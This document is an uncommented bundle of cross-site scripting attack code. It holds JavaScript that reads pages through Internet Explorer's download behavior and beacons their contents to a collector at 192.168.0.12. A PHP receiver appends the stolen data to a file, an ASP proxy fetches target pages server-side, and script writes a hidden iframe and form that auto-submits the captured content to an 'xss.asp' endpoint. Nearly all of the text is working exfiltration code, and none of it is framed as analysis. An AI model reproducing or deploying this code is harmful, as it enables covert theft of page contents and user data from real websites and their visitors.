document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}

function GetData(source)
{
txt=escape(source);
getReaded(txt);
}
function getReaded(usr) {
var newimg = new Image();
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n";
}

<?php
header('Content-Type:text/html;charset=GB2312');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
fputs(fopen($file,'a+'),$_GET['key']);
?>

<%
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
function PageWebProxy(xmlpath)
Dim i, re, Url, Html
Url = xmlpath

Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
If Split(Url, "/")(2) = "club.isso.com.cn" Then
Html = Replace(Html, "%26amp;", "%26")
Else
Html = Replace(Html, "%26amp;", "&amp;")
End If
Html = Replace(Html, "%26nbsp;", "&nbsp;")
Html = Replace(Html, "%26lt;", "&lt;")
Html = Replace(Html, "%26gt;", "&gt;")
Html = Replace(Html, "%26quot;", "&quot;")
Html = Replace(Html, "%26copy;", "&copy;")
Html = Replace(Html, "%26reg;", "&reg;")
Html = Replace(Html, "%26raquo;", "&raquo;")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
' Html = Replace(Html, "%26", "")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
Html = re.Replace(Html,"?url=$1")
re.Pattern = "\?url=" & Url & "(#|javascript:)"
Html = re.Replace(Html,"$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html,"")
PageWebProxy=Html
End function
Function getHTTPPage(url)
Dim Http, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
Next
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.Send(theStr)
Else
Http.Open "GET", url, False
Http.Send()
End If
If Http.readystate<>4 then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responseBody
Response.End()
Else
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.responseBody
Response.Flush
Else
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = nothing
End Function
%>

document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>")
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit style=display:none>");
document.writeln("<\/form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();